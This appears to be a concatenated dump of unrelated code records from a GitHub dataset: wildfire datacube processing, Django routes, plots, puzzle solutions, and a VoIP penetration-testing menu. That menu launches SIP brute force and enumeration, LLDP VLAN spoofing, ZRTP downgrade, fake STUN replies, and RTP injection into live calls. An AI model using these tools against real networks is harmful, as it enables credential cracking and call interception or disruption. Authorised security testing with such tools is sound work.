# Deleting attribute grid_mapping of the burn_mask_filter data set\n del burn_mask_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the evap_filter_proj data set\n del evap_filter_proj.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the lst_night_filter data set\n del lst_night_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the lst_day_filter data set\n del lst_day_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the ndvi_filter data set\n del ndvi_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the lai_filter data set\n del lai_filter.attrs['grid_mapping']\n\n ''' 2) Create the two list from the name of the coordinates'''\n # Create a list of the data sets\n data_sets = [ndvi_filter_daily, burn_mask_filter_daily, lai_filter_proj_daily, evap_filter_proj_daily,\n era_filter_proj, active_fire_filter_proj_daily]\n\n # Create a first list with coordinate x and y\n list_xy = [lai_filter_proj_daily,\n evap_filter_proj_daily,\n era_filter_proj,\n density_proj]\n\n # Create a second list with coordinate xdim and ydim\n list_xdimydim = [ndvi_filter_daily,\n burn_mask_filter_daily,\n active_fire_filter_proj_daily,\n lst_night_filter,\n lst_day_filter]\n\n # Merge and save by coordinates the data sets from the lists\n ds_xy = xr.combine_by_coords(list_xy, combine_attrs='drop_conflicts')\n ds_xdimydim = xr.combine_by_coords(list_xdimydim, combine_attrs='drop_conflicts')\n\n ''' 3) Match the coordinates of the data sets to match the other data sets'''\n ds_xdimydim_xdimydim = ds_xdimydim.assign_coords(xdim=ds_xy.coords['x'].values, ydim=ds_xy.coords['y'].values)\n\n ''' 4) Rename the coordinates to match the other data sets'''\n ds_xdimydim_xdimydim = ds_xdimydim_xdimydim.rename({'xdim': 'x', 'ydim': 'y'})\n\n ''' 5) Merge the data sets'''\n ds = xr.merge([ds_xy, ds_xdimydim_xdimydim])\n\n ''' ----------------------------------------------------------------------------------------------- \n---------------------------------10 Poject to GPS coordinates-------------------------------------------------'''\n\n ''' We have a datacube with the following dimensions: time, y, x. 
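Editor's note: `module_cube`'s `resample_to_daily` / `resample_to_daily_categorical` helpers are not shown in this record. Given how they are used above — downsampling 4-hourly ERA5 and upsampling 8/16-day MODIS composites with the same call — one plausible minimal reading is a 1-day resample with a mean plus forward fill, and a pure forward fill for categorical layers (this is a guess, not the repo's implementation):

```python
def resample_to_daily(ds):
    # mean() aggregates when downsampling (4-hourly ERA5); the trailing
    # ffill covers the empty bins created when upsampling 8/16-day composites
    return ds.resample(time="1D").mean().ffill(dim="time")

def resample_to_daily_categorical(ds):
    # masks and burn dates must not be averaged, only carried forward
    return ds.resample(time="1D").ffill()
```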
We want now:\n to project it into GPS coordinates.'''\n\n ''' Projection of the data cube into GPS coordinates'''\n # Projection of ds into WGS84\n ds_gps = ds.rio.reproject(\"EPSG:4326\", grid_mapping_name='latitude_longitude')\n\n ''' ----------------------------------------------------------------------------------------------------------------\n------------------------------- 11 Create aggregated variables --------------------------------------------\n\n 1) Create a list of the dynamic variables to aggregate\n 2) Split the datacube into 10 datacubes of 1 year for computation reasons \n 3) Apply the function to aggregate the variables: mean over 10 previous days\n 4) Concatenate the datacubes'''\n\n ''' 1) Create a list of the dynamic variables to aggregate'''\n dynamic_variables = ['ET_500m',\n 'Fpar_500m',\n 'u10',\n 'v10',\n 't2m',\n 'tp',\n 'LST_Day_1km',\n 'LST_Night_1km',\n '_1_km_16_days_EVI']\n\n ''' 2) Split the datacube into 10 datacubes of 1 year for computation reasons'''\n list_ds = hz.split_datacube(ds_gps, first_year=2010, last_year=2011)\n\n ''' 3) Apply the function to aggregate the variables: mean over 10 previous days'''\n for i in range(len(list_ds)):\n list_ds[i] = hz.aggregate_dataset(list_ds[i], period_size=10, dynamic_variables=dynamic_variables)\n print(f\"list_ds[{i}] ok\")\n\n ''' 4) Concatenate the datacubes'''\n aggregate_datacube = xr.concat(list_ds, dim=\"time\")\n\n ''' ---------------------------------------------------------------------------------------------------------------- \n----------------------------------------------12. Save the datacube--------------------------------------------------\n\n 1) Delete unnecessary attributes\n 2) Save the datacube'''\n\n ''' 1) Delete unnecessary attributes'''\n del aggregate_datacube['First_Day'].attrs['grid_mapping']\n del aggregate_datacube['Last_Day'].attrs['grid_mapping']\n del aggregate_datacube['Burn_Date'].attrs['grid_mapping']\n del aggregate_datacube['FireMask'].attrs['grid_mapping']\n\n ''' 2) Save the datacube'''\n aggregate_datacube.to_netcdf(path_data + 'aggregate_datacube.nc')\n","repo_name":"Sliders122/wildfire","sub_path":"src/cube/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":14726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"38703229346","text":"from django.urls import path\nfrom . 
import views\napp_name='DevTools'\n\nurlpatterns = [\n path('', views.tool_list, name ='tool_list'),\n path('create/', views.tool_create, name ='tool_create'),\n path('/', views.tool_detail, name ='tool_detail'),\n path('/delete/',views.tool_delete, name='tool_delete'),\n path('/update/', views.tool_update, name='tool_update'),\n]","repo_name":"SeungJooKim/KimSeungju","sub_path":"SWIDEA_SITE/config/DevTools/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1108472611","text":"import argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', '--infile', type=str, action='store', dest='infile',\thelp='Folder containing original couplings')\nparser.add_argument('-o', '--outfile', type=str, action='store', dest='outfile', help='Flag for output files')\nparser.add_argument('-s', '--slice_length',type=int, action='store', dest='slice_length',default=0, help='length of slice from sequence used in training')\nargs = parser.parse_args()\n\ndef freq(h,J,L):\n\tf_start = np.exp( - h)\n\tf1 = np.exp( - h - 0.5 * np.tensordot(J, f_start, axes=2))\n\tf2 = np.exp( - h.reshape(L,3,1,1) - h.reshape(1,1,L,3) - 0.5 * J \\\n\t\t- 0.5 * np.tensordot(J, f_start, axes=2).reshape(L,3,1,1) \\\n\t\t- 0.5 * np.tensordot(J, f_start, axes=2).reshape(1,1,L,3) )\n\treturn (f1,f2)\n\n\nJ_init = np.load(f'../test_data/output_{args.infile}/couplings_init.npy')\nh_init = np.load(f'../test_data/output_{args.infile}/fields_init.npy')\nL = h_init.shape[0]\nf_init_1, f_init_2 = freq(h_init,J_init,L)\n\n\nif args.slice_length == 0:\n\tJ_mf = np.load(f'../test_data/output_{args.infile}/{args.outfile}/couplings_mf.npy')\n\th_mf = np.load(f'../test_data/output_{args.infile}/{args.outfile}/fields_mf.npy')\n\tf_mf_1, f_mf_2 = freq(h_mf,J_mf,L)\n\n\tfig, (ax1,ax2) = plt.subplots(1,2)\n\n\tax1.scatter(f_init_1.flatten(),f_mf_1.flatten(),color='red',alpha=0.5)\n\tax1.legend()\n\tax1.set_xlabel(r'f$_{1s init}$')\n\tax1.set_ylabel(r'f$_{1s MF}$')\n\n\n\tax2.scatter(f_init_2.flatten(),f_mf_2.flatten(),color='red',alpha=0.5)\n\tax2.legend()\n\tax2.set_xlabel(r'f$_{2s init}$')\n\tax2.set_ylabel(r'f$_{2s MF}$')\n\n\tplt.suptitle('Actual vs. inferred values for mean-field inference of a Gaussian matrix padded with zeros')\n\tplt.show()\nelse:\n\tJ_mf_slice = np.load(f'../test_data/output_{args.infile}/{args.outfile}/couplings_mf_slice_{args.slice_length}.npy')\n\th_mf_slice = np.load(f'../test_data/output_{args.infile}/{args.outfile}/fields_mf_slice_{args.slice_length}.npy')\n\n\tL = J_init.shape[0]\n\tgap = (L - args.slice_length) //2\n\tJ_mf = np.zeros((L,3,L,3))\n\tJ_mf[gap:(L-gap),:,gap:(L-gap),:] = J_mf_slice\n\th_mf = np.zeros((L,3))\n\th_mf[gap:(L-gap),:] = h_mf_slice\n\n\tf_mf_1, f_mf_2 = freq(h_mf,J_mf,L)\n\n\tfig, (ax1,ax2) = plt.subplots(1,2)\n\n\tax1.scatter(f_init_1.flatten(),f_mf_1.flatten(),color='red',alpha=0.5)\n\tax1.legend()\n\tax1.set_xlabel(r'f$_{1s init}$')\n\tax1.set_ylabel(r'f$_{1s MF}$')\n\n\n\tax2.scatter(f_init_2.flatten(),f_mf_2.flatten(),color='red',alpha=0.5)\n\tax2.legend()\n\tax2.set_xlabel(r'f$_{2s init}$')\n\tax2.set_ylabel(r'f$_{2s MF}$')\n\n\n\tplt.suptitle('Actual vs. 
inferred values for mean-field inference of a Gaussian matrix padded with zeros')\n\tplt.show()","repo_name":"andrewcboardman/aptamers","sub_path":"plotting/plot_ising_freqs.py","file_name":"plot_ising_freqs.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21815205047","text":"class Solution:\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n v1 = [int(i) for i in version1.split(\".\")]\n v2 = [int(i) for i in version2.split(\".\")]\n \n for i in range(max(len(v1),len(v2))):\n v1_ = v1[i] if i < len(v1) else 0\n v2_ = v2[i] if i < len(v2) else 0\n \n if v1_ > v2_:\n return 1\n elif v1_ < v2_:\n return -1\n return 0","repo_name":"sk-g/Leetcode","sub_path":"python/165. Compare Version Numbers.py","file_name":"165. Compare Version Numbers.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"24742761500","text":"import os\nimport sys\nimport subprocess\nfrom cmd import Cmd\nfrom helper import logo\n\n\ndef run_tool(tool_folder, command):\n '''This function will spawn a safe subprocess'''\n cwd = os.getcwd()\n cmd = command.split()\n cmd[0] = ''.join((cwd, '/tools/', tool_folder, '/', cmd[0]))\n subprocess.run(cmd, shell=False, cwd=os.path.join(cwd, 'tools', tool_folder))\n\n\nclass Wizard(Cmd):\n prompt = '\\033[0;32mwizard > \\033[0m'\n intro = logo()\n\n\n def do_bridge(self, inp):\n '''The bridge tool is a full layer2 bridge with two defined interfaces'''\n tool_folder = \"FullBridge\"\n print(\"\\nThe bridge tool is a full layer2 bridge with two defined interfaces\\n\")\n bridge_first_interface = input(\"Enter the first interface: \")\n bridge_second_interface = input(\"Enter the second Interface: \")\n bridge_bridgemode = input(\"Enter the bridge mode : \")\n run_tool(\n tool_folder, f\"fullbridge.sh {bridge_first_interface} {bridge_second_interface} {bridge_bridgemode}\")\n\n\n def do_vlanenum(self, inp):\n '''The vlanenum tool is a VLAN enumeration which creates virtual interfaces if VLAN's were found'''\n tool_folder = \"VlanEnum\"\n print(\"The vlanenum tool is a VLAN enumeration which creates virtual interfaces if VLAN's were found\")\n print(\"\\033[1;34m[*]\\033[0m If you want to enumerate numerous VLAN ID's, you should better use the vlanenum.sh script with multiple tmux sessions and different start VLAN ID's\")\n print(\"\")\n vlanenum_interface = input(\"Enter the interface which will be used: \")\n vlanenum_start_vid = input(\"Enter the start VLAN ID [1]: \") or \"1\"\n vlanenum_last_vid = input(\"Enter the last VLAN ID [4096]: \") or \"4096\"\n run_tool(\n tool_folder, f'vlanenum.sh {vlanenum_interface} {vlanenum_start_vid} {vlanenum_last_vid}')\n\n\n def do_timeshift(self, inp):\n '''The timeshift tool is a simple NTP Responder which sets the date to the past or to the future'''\n tool_folder = \"TimeShift\"\n print(\"The timeshift tool is a simple NTP Responder which sets the date to the past or to the future\")\n print(\"\\033[1;34m[*]\\033[0m You have to be in a man-in-the-middle position e.g. 
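Editor's note: the wizard's `run_tool` above builds an absolute path to the selected tool and executes it with `shell=False`, so interactive input is never interpreted by a shell. The core pattern, reduced (folder and command here are hypothetical):

```python
import os
import subprocess

def run_in(folder, command):
    # shlex.split(command) would be more robust for quoted arguments
    argv = command.split()
    argv[0] = os.path.join(os.getcwd(), 'tools', folder, argv[0])
    # shell=False passes argv directly to the OS, sidestepping shell injection
    subprocess.run(argv, shell=False, cwd=os.path.dirname(argv[0]))
```

Setting `cwd` to the tool's own folder matters for tools that resolve their data files relative to where they run.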
with the bridge tool or arp spoofing\")\n        timeshift_src_ip = input(\"Enter the target IP address: \")\n        timeshift_mode = input(\n            \"Enter the mode <past or future> [past]: \") or \"past\"\n        run_tool(tool_folder,\n                 f'timeshift.py -s {timeshift_src_ip} -m {timeshift_mode}')\n\n\n    def do_lldpspoof(self, inp):\n        '''This tool is for spoofing LLDP-MED packets with different vendor specific attributes. It is useful to jump into the VoIP VLAN if LLDP-MED is configured'''\n        tool_folder = \"SaCLaC\"\n        print(\"This tool is for spoofing LLDP-MED packets with different vendor specific attributes. It is useful to jump into the VoIP VLAN if LLDP-MED is configured\")\n        lldpspoof_interface = input(\"Enter the interface which will be used: \")\n        lldpspoof_vendor = input(\"Enter the vendor [innovaphone]: \") or \"innovaphone\"\n\n        if lldpspoof_vendor == \"innovaphone\":\n            lldpspoof_mac = input(\"Enter the MAC address of an innovaphone device <00:90:33:XX:XX:XX> [00:90:33:00:00:01]: \") or \"00:90:33:00:00:01\"\n            lldpspoof_device = input(\"Enter a device model e.g. [IP222]: \") or \"IP222\"\n            lldpspoof_verbose = input(\"Verbose mode (will capture the possible response and open it in wireshark)? <y> or [n]: \") or \"n\"\n\n            cmd = f\"lldpspoof.py -V {lldpspoof_vendor} -m {lldpspoof_mac} -D {lldpspoof_device} -i {lldpspoof_interface}\"\n            if lldpspoof_verbose == \"y\":\n                cmd += \" -v\"\n            run_tool(tool_folder, cmd)\n        elif lldpspoof_vendor == \"unify\":\n            lldpspoof_mac = input(\"Enter the MAC address of a unify device <00:1a:e8:XX:XX:XX> [00:1a:e8:00:00:01]: \") or \"00:1a:e8:00:00:01\"\n            lldpspoof_verbose = input(\"Verbose mode (will capture the possible response and open it in wireshark)? <y> or [n]: \") or \"n\"\n            cmd = f\"lldpspoof.py -V {lldpspoof_vendor} -m {lldpspoof_mac} -i {lldpspoof_interface}\"\n            if lldpspoof_verbose == \"y\":\n                cmd += \" -v\"\n            run_tool(tool_folder, cmd)\n        else:\n            print(\"Please set a valid vendor\")\n\n\n    def do_lldpdos(self, inp):\n        '''This tool is for spoofing LLDP-MED packets with a tagged or untagged VLAN ID which will be set by the device'''\n        tool_folder = \"SaCLaC\"\n        print(\"This tool is for spoofing LLDP-MED packets with a tagged or untagged VLAN ID which will be set by the device\")\n        lldpdos_interface = input(\"Enter the interface which will be used: \")\n        lldpdos_mode = input(\"Enter the mode <tag or untag> [tag]: \") or \"tag\"\n        lldpdos_mac = input(\"Enter the MAC address of the switch [78:d0:04:00:00:01]: \") or \"78:d0:04:00:00:01\"\n        lldpdos_verbose = input(\"Verbose mode (will capture the possible response and open it in wireshark)? <y> or [n]: \") or \"n\"\n        
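# (reading of the branches below) mode \"tag\" sends the plain --dos packet, while \"untag\" additionally appends --untag\n        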
cmd = f\"lldpspoof.py --dos -m {lldpdos_mac} -i {lldpdos_interface}\"\n        if lldpdos_mode == \"tag\":\n            if lldpdos_verbose == \"y\":\n                cmd += \" -v\"\n            run_tool(tool_folder, cmd)\n\n        elif lldpdos_mode == \"untag\":\n            if lldpdos_verbose == \"y\":\n                cmd += \" --untag -v\"\n            else:\n                cmd += \" --untag\"\n            run_tool(tool_folder, cmd)\n        else:\n            print(\"Please set a valid mode\")\n\n\n    def do_decryptsrtp(self, inp):\n        '''If you have the AES key from the SDP crypto attribute of the signaling part, you can decrypt the SRTP-SDES stream with this tool'''\n        tool_folder = \"DecryptSRTP\"\n        print(\"If you have the AES key from the SDP crypto attribute of the signaling part, you can decrypt the SRTP-SDES stream with this tool\")\n        print(\"Sniff the RTP stream and extract only the RTP part into a separate PCAP file\")\n        decryptsrtp_keysize = input(\"Enter the keysize <128> or <256> [128]: \") or \"128\"\n        decryptsrtp_key = input(\"Enter the AES key base64 encoded: \")\n        decryptsrtp_infile = input(\"Enter the infile containing the extracted RTP stream: \")\n        decryptsrtp_outfile = input(\"Enter the outfile (if nothing is set the file is stored under ./tools/DecryptSRTP/): \")\n        run_tool(tool_folder, f\"decryptsrtp.sh {decryptsrtp_keysize} {decryptsrtp_key} {decryptsrtp_infile} {decryptsrtp_outfile}\")\n\n\n    def do_cdpanalyze(self, inp):\n        '''A tool to analyze CDP packets in a PCAP file'''\n        tool_folder = \"SaCLaC\"\n        print(\"A tool to analyze CDP packets in a PCAP file\")\n        cdpanalyze_file = input(\"Enter the PCAP file to analyze: \")\n        cdpanalyze_verbose = input(\"Verbose mode will display all packet information <y> or [n]: \")\n        cmd = f\"cdpanalyze.py -f {cdpanalyze_file}\"\n        if cdpanalyze_verbose == \"y\":\n            cmd += \" -v\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_sipcrack(self, inp):\n        '''A tool for brute forcing SIP digest authentication'''\n        tool_folder=\"CrackTheSIP\"\n        print(\"A tool for brute forcing SIP digest authentication\")\n        sipcrack_username=input(\"Enter the username: \")\n        sipcrack_uri=input(\"Enter the URI: \")\n        sipcrack_nonce=input(\"Enter the nonce: \")\n        sipcrack_realm=input(\"Enter the given realm: \")\n        sipcrack_cnonce=input(\"Enter the cnonce (if it exists): \")\n        sipcrack_noncecount=input(\"Enter the nonce count (if it exists): \")\n        sipcrack_qop=input(\"Enter the QOP [auth]: \") or \"auth\"\n        sipcrack_response=input(\"Enter the SIP client's response: \")\n        sipcrack_message=input(\"Enter the message type [REGISTER]: \") or \"REGISTER\"\n        sipcrack_wordlist=input(\"Enter the wordlist for brute force: \")\n        cmd=f\"sipcrack.py --username {sipcrack_username} --uri {sipcrack_uri} --nonce {sipcrack_nonce} --realm {sipcrack_realm} --response {sipcrack_response} --msg {sipcrack_message} --wordlist {sipcrack_wordlist}\"\n        if sipcrack_cnonce:\n            cmd += f\" --cnonce {sipcrack_cnonce} --noncecount {sipcrack_noncecount} --qop {sipcrack_qop}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_zrtpdowngrade(self, inp):\n        '''A tool to downgrade the ZRTP media stream'''\n        tool_folder = \"ZRTPDowngrade\"\n        print(\"A tool to downgrade the ZRTP media stream\")\n        zrtpdowngrade_interface=input(\"Enter the interface on which the tool will listen [all]: \") or \"all\"\n        cmd = \"zrtpdowngrade.py\"\n        if zrtpdowngrade_interface != \"all\":\n            cmd += f\" -i {zrtpdowngrade_interface}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_evilstun(self, inp):\n        '''A simple tool for fake STUN responses'''\n        tool_folder=\"EvilSTUN\"\n        print(\"A simple tool for fake STUN responses\")\n        
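# the forged response advertises rtpip:rtpport as the mapped address, steering the peer's media to that endpoint\n        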
evilstun_stunip=input(\"Enter the listening ip address for STUN requests: \")\n        evilstun_stunport=input(\"Enter the listening port for STUN requests [3478]: \") or \"3478\"\n        evilstun_rtpip=input(\"Enter the fake ip address in the response: \")\n        evilstun_rtpport=input(\"Enter the fake port in the response [16000]: \") or \"16000\"\n        cmd=f\"evilstun.py --stunip {evilstun_stunip} --stunport {evilstun_stunport} --rtpip {evilstun_rtpip} --rtpport {evilstun_rtpport}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_sipfuzz(self, inp):\n        '''A tool for SIP fuzzing'''\n        tool_folder=\"SIPFuzz\"\n        print(\"A tool for SIP fuzzing\")\n        sipfuzz_dstip=input(\"Enter the destination SIP server: \")\n        sipfuzz_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n        sipfuzz_proto=input(\"Enter the protocol <tcp> or [udp]: \") or \"udp\"\n        sipfuzz_file=input(\"Enter the fuzz request file. Insert \\\"FUZZ\\\" at the point you want to fuzz: \")\n        sipfuzz_startpoint=input(\"Enter the fuzzing start point [1]: \") or \"1\"\n        sipfuzz_steps=input(\"Enter the fuzzing steps [1]: \") or \"1\"\n        sipfuzz_size=input(\"Enter the fuzzing max. size [2000]: \") or \"2000\"\n        sipfuzz_char=input(\"Enter the fuzzing char [A]: \") or \"A\"\n        sipfuzz_time=input(\"Enter the delay between the fuzzing steps in seconds [0.5]: \") or \"0.5\"\n        cmd=f\"sipfuzz.py --dst {sipfuzz_dstip} --dport {sipfuzz_dstport} --proto {sipfuzz_proto} --file {sipfuzz_file} --start-point {sipfuzz_startpoint} --steps {sipfuzz_steps} --size {sipfuzz_size} --char {sipfuzz_char} --time {sipfuzz_time}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_sipenum(self, inp):\n        '''A tool for SIP extension enumeration'''\n        tool_folder=\"SIPEnum\"\n        print(\"A tool for SIP extension enumeration\")\n        sipenum_dstip=input(\"Enter the destination SIP server: \")\n        sipenum_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n        sipenum_proto=input(\"Enter the protocol <tcp>, <tls> or [udp]: \") or \"udp\"\n        if sipenum_proto == \"tls\":\n            sipenum_crt=input(\"Enter the certificate file [crt.crt]: \") or \"crt.crt\"\n            sipenum_key=input(\"Enter the private key file [key.key]: \") or \"key.key\"\n        sipenum_srcip=input(\"Enter the source ip address: \")\n        sipenum_domain=input(\"Enter the SIP domain: \")\n        sipenum_wordlist=input(\"Enter the wordlist with user extensions for enumeration [users/10-99.txt]: \") or \"users/10-99.txt\"\n        if sipenum_proto == \"tls\":\n            cmd=f\"sipenum.py --dst {sipenum_dstip} --dport {sipenum_dstport} --proto {sipenum_proto} --wordlist {sipenum_wordlist} --src {sipenum_srcip} --domain {sipenum_domain} --key {sipenum_key} --crt {sipenum_crt}\"\n        else:\n            cmd=f\"sipenum.py --dst {sipenum_dstip} --dport {sipenum_dstport} --proto {sipenum_proto} --wordlist {sipenum_wordlist} --src {sipenum_srcip} --domain {sipenum_domain}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_sipbrute(self, inp):\n        '''A tool for SIP online brute force attacks'''\n        tool_folder=\"SIPBrute\"\n        print(\"A tool for SIP online brute force attacks\")\n        sipbrute_dstip=input(\"Enter the destination SIP server: \")\n        sipbrute_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n        sipbrute_proto=input(\"Enter the protocol <tcp>, <tls> or [udp]: \") or \"udp\"\n        if sipbrute_proto == \"tls\":\n            sipbrute_crt=input(\"Enter the certificate file [crt.crt]: \") or \"crt.crt\"\n            sipbrute_key=input(\"Enter the private key file [key.key]: \") or \"key.key\"\n        sipbrute_srcip=input(\"Enter the source ip address: \")\n        sipbrute_domain=input(\"Enter the SIP domain: \")\n        sipbrute_user=input(\"Enter the SIP username: \")\n        
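# the crt/key pair above is only collected (and passed below) when proto == \"tls\"; udp and tcp need no key material\n        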
sipbrute_wordlist=input(\"Enter the wordlist with passwords for the brute force attack [passwords/1-999999.txt]: \") or \"passwords/1-999999.txt\"\n        if sipbrute_proto == \"tls\":\n            cmd=f\"sipbrute.py --dst {sipbrute_dstip} --dport {sipbrute_dstport} --proto {sipbrute_proto} --user {sipbrute_user} --wordlist {sipbrute_wordlist} --src {sipbrute_srcip} --domain {sipbrute_domain} --key {sipbrute_key} --crt {sipbrute_crt}\"\n        else:\n            cmd=f\"sipbrute.py --dst {sipbrute_dstip} --dport {sipbrute_dstport} --proto {sipbrute_proto} --user {sipbrute_user} --wordlist {sipbrute_wordlist} --src {sipbrute_srcip} --domain {sipbrute_domain}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_rtpfuzz(self, inp):\n        '''A tool for fuzzing and injecting random RTP packets (noise) into running streams'''\n        tool_folder=\"RTPFuzz\"\n        print(\"A tool for fuzzing and injecting random RTP packets (noise) into running streams\")\n        rtpfuzz_dstip=input(\"Enter RTP destination ip address: \")\n        rtpfuzz_dstport=input(\"Enter RTP destination port: \")\n        rtpfuzz_srcip=input(\"Enter RTP source ip address: \")\n        rtpfuzz_srcport=input(\"Enter RTP source port: \")\n        rtpfuzz_sseq=input(\"Enter start sequence number [0]: \") or \"0\"\n        rtpfuzz_eseq=input(\"Enter end sequence number (amount of packets) [500]: \") or \"500\"\n        rtpfuzz_ssrc=input(\"Enter the synchronization source identifier [208851373]: \") or \"208851373\"\n        rtpfuzz_type=input(\"Enter payload type. Default is \\\"8\\\", which is PCMA [8]: \") or \"8\"\n        rtpfuzz_time=input(\"Enter timestamp [2000000]: \") or \"2000000\"\n        cmd=f\"rtpfuzz.py --dst {rtpfuzz_dstip} --dport {rtpfuzz_dstport} --src {rtpfuzz_srcip} --sport {rtpfuzz_srcport} --startseq {rtpfuzz_sseq} --endseq {rtpfuzz_eseq} --ssrc {rtpfuzz_ssrc} --type {rtpfuzz_type} --time {rtpfuzz_time}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_rtpaudioinject(self, inp):\n        '''A tool for injecting a raw audio file into running streams'''\n        tool_folder=\"RTPAudioInjection\"\n        print(\"A tool for injecting a raw audio file into running streams\")\n        rtpai_dstip=input(\"Enter RTP destination ip address: \")\n        rtpai_dstport=input(\"Enter RTP destination port: \")\n        rtpai_srcip=input(\"Enter RTP source ip address: \")\n        rtpai_srcport=input(\"Enter RTP source port: \")\n        rtpai_sseq=input(\"Enter start sequence number [0]: \") or \"0\"\n        rtpai_ssrc=input(\"Enter the synchronization source identifier [208851373]: \") or \"208851373\"\n        
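# to be accepted into a live session, the ssrc/sequence/timestamp values should match the sniffed target stream\n        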
rtpai_type=input(\"Enter payload type. Default is \\\"8\\\", which is PCMA [8]: \") or \"8\"\n        rtpai_time=input(\"Enter timestamp [2000000]: \") or \"2000000\"\n        rtpai_file=input(\"Enter raw audio file [rickroll.g711a]: \") or \"rickroll.g711a\"\n        cmd=f\"rtpaudioinject.py --dst {rtpai_dstip} --dport {rtpai_dstport} --src {rtpai_srcip} --sport {rtpai_srcport} --startseq {rtpai_sseq} --ssrc {rtpai_ssrc} --type {rtpai_type} --time {rtpai_time} --file {rtpai_file}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_sipdiscover(self, inp):\n        '''A tool to discover SIP services'''\n        tool_folder=\"SIPDiscover\"\n        print(\"A tool to discover SIP services\")\n        sipdiscover_dstip=input(\"Enter the destination SIP server: \")\n        sipdiscover_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n        sipdiscover_proto=input(\"Enter the protocol <tcp>, <tls> or [udp]: \") or \"udp\"\n        if sipdiscover_proto == \"tls\":\n            sipdiscover_crt=input(\"Enter the certificate file [crt.crt]: \") or \"crt.crt\"\n            sipdiscover_key=input(\"Enter the private key file [key.key]: \") or \"key.key\"\n        sipdiscover_srcip=input(\"Enter the source ip address: \")\n        sipdiscover_domain=input(\"Enter the SIP domain: \")\n        sipdiscover_user=input(\"Enter the SIP username: \")\n        if sipdiscover_proto == \"tls\":\n            cmd=f\"sipdiscover.py --dst {sipdiscover_dstip} --dport {sipdiscover_dstport} --proto {sipdiscover_proto} --src {sipdiscover_srcip} --domain {sipdiscover_domain} --user {sipdiscover_user} --crt {sipdiscover_crt} --key {sipdiscover_key}\"\n        else:\n            cmd=f\"sipdiscover.py --dst {sipdiscover_dstip} --dport {sipdiscover_dstport} --proto {sipdiscover_proto} --src {sipdiscover_srcip} --domain {sipdiscover_domain} --user {sipdiscover_user}\"\n        run_tool(tool_folder, cmd)\n\n\n    def do_exit(self, inp):\n        '''Exiting the tool'''\n        print(\"Bye\")\n        sys.exit(0)\n\n\n    def do_clear(self, inp):\n        '''Clearing the screen'''\n        subprocess.run(\"clear\", shell=False)\n        print(logo())\n\n","repo_name":"SySS-Research/WireBug","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":17577,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"67"} +{"seq_id":"2706426757","text":"import collections\n\ndef get_input():\n    in_file = open('in22.txt', 'r')\n    in_str = in_file.read().replace(' ', ',')\n    commands = []\n    for line in in_str.split('\\n'):\n        sections = line.split(',')\n        cmd = sections[0]\n        x_axis, numbers = sections[1].split('=')\n        x1, x2 = numbers.split('..')\n        y_axis, numbers = sections[2].split('=')\n        y1, y2 = numbers.split('..')\n        z_axis, numbers = sections[3].split('=')\n        z1, z2 = numbers.split('..')\n        commands.append((cmd, (int(x1), int(x2)), (int(y1), int(y2)), (int(z1), int(z2))))\n    in_file.close()\n    return commands\n\n\ndef solve_a(commands):\n    cube = [[[0 for _ in range(100)] for _ in range(100)] for _ in range(100)]\n    for cmd in commands[:20]:\n        s = 0\n        if cmd[0] == 'on':\n            s = 1\n        if abs(cmd[1][0]) <= 50:\n            for i in range(cmd[1][0], cmd[1][1] + 1):\n                for j in range(cmd[2][0], cmd[2][1] + 1):\n                    for k in range(cmd[3][0], cmd[3][1] + 1):\n                        cube[i][j][k] = s\n    count = 0\n    for side in cube:\n        for row in side:\n            for entry in row:\n                if entry:\n                    count += 1\n    return count\n\n\ndef generate_overlap(cuboid, cmd):\n    # sign = -1 if cuboid[0] > 0 else 1\n    x = (max(cuboid[0][0], cmd[1][0]), min(cuboid[0][1], cmd[1][1]))\n    y = (max(cuboid[1][0], cmd[2][0]), min(cuboid[1][1], cmd[2][1]))\n    z = (max(cuboid[2][0], cmd[3][0]), min(cuboid[2][1], cmd[3][1]))\n    # return (sign*abs((x[1] - x[0] + 1)*(y[1] - y[0] + 1)*(z[1] - z[0] + 1))), 
